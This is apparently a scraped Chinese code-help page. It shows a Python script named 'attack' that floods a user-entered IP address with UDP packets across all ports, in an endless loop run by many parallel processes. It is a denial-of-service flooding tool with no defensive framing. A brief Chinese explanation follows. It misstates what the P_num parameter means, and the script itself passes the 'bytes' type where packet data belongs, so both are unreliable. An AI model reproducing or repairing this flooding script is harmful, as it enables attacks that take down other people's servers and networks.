def attack(P_num,ip,port): import sys import os import time import socket import random # Code Time from datetime import datetime now = datetime.now() hour = now.hour minute = now.minute day = now.day month = now.month year = now.year sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sent=0 while True: sock.sendto(bytes, (ip, port)) sent = sent + 1 port = port + 1 print("%s Proccess Sent %s packet to %s throught port:%s" % (P_num,sent, ip, port)) if port == 65534: port = 1 if __name__ == '__main__': import os from multiprocessing import Process ip = input("IP Target : ") port = int(input("Port : ")) num=input("并行数 :") list=[] for i in range(int(num)): p=Process(target=attack,args=(i,ip,port)) list.append(p) for i in list: i.start() for i in list: i.join()
时间: 2023-03-21 15:00:23 浏览: 125
关于python导入模块import与常见的模块详解
5星 · 资源好评率100%
这是一个Python函数,用于进行攻击。它的参数是"P_num","ip"和"port"。其中,"P_num"表示攻击使用的进程数,"ip"表示目标IP地址,"port"表示目标端口号。
在函数中,导入了一些必要的Python库,包括"sys"、"os"、"time"和"socket"等。同时,还导入了"random"库,用于生成随机数。
该函数的具体实现需要看更多代码。
阅读全文